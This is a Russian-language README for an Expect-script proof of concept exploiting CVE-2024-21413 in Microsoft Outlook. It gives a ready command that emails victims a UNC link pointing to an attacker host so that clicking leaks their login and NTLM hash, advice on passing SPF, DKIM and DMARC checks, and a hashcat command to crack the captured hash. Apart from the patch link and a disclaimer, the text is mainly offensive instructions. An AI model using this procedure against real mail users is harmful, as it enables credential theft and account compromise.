
Уязвимость раскрытия информации Microsoft Outlook (утечка хэша пароля) - Expect Script POC
Уязвимость утечки учетных данных и удаленного выполнения кода в Microsoft Outlook при связке с CVE-2023-21716 (через панель предварительного просмотра) CVSS:3.1 9.8 / 8.5
Outlook должен предупреждать о риске при открытии внешней ссылки, но этого не происходит!

использование: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
примечания: chmod +x cve-2024-21413.sh
требуется приложение expect и требуется легитимный IP-отправитель и адрес отправителя (чтобы пройти SPF, DKIM, DMARC)



затем вы должны получить логин и хэш пользователя, который нажал на ссылку (без предупреждающего сообщения в уязвимых версиях Outlook)

Затем вы можете попытаться взломать пароль с помощью hashcat. Просто скопируйте всю строку с именем пользователя в файл и запустите hashcat с модулем 5600
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
Благодарности: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]
Обходное решение/Исправление: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
больше обо мне ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставляется ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его в какой-либо системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям является незаконным, и пользователи, уличенные в несанкционированных действиях, подлежат юридической ответственности. Автор НЕ несет ответственности за любой ущерб, вызванный неправильным использованием этого скрипта.